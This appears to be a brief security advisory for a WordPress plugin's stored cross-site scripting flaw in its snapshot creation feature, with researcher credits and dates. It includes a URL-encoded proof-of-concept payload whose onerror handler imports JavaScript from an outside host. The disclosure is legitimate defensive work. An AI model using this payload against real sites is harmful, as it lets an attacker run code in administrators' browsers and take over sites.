The plugin did not sanitise or escape its extra_data parameter when creating a snapshot via the admin dashboard, leading to an authenticated Stored Cross-Site Scripting issue
PoC | Authenticated Persistent XSS | Enter snapshot name or brief description: https://example.com/wp-admin/admin-ajax.php?action=wp_reset_run_tool&_ajax_nonce=394f497fd0&tool=create_snapshot&extra_data=%3Cimg%20src%3Dx%20onerror%3D%3Bimport(%60%2F%2Fm0ze.ru%2Fpayload%2Fa.js%60)%3B%20%2F%2F%3E
m0ze
m0ze
Yes
2021-06-16 (about 2 years ago)
2021-06-16 (about 2 years ago)
2022-03-05 (about 1 years ago)